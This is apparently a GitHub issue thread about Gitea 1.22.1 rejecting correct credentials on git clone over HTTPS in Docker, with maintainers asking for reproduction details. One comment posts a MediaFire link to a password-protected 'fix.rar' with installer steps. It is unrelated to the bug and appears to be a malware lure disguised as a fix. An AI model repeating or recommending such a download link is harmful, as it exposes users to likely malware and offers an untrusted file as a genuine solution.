### ISSUE TITLE
gitea/gitea 1.22.1 

### ISSUE THREAD

**Issue by Lupin77** [go-gitea/gitea#31929]
### Description

Dear Gitea team,
We have found a bug with the docker gitea 1.22.1 version running git clone <https://user:password@private_repo.git>
I got remote Unauthorized Authentication failed using the correct password.
Using the same user and password works properly from web browser

### Gitea Version

1.22.1

### Can you reproduce the bug on the Gitea demo site?

No

### Operating System

Rocky Linux 8.x

### How are you running Gitea?

docker container

### Database

None

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lunny** [comment]
Can you reproduce in demo site?

**Comment by yp05327** [comment]
Or are there any special characters in your password.
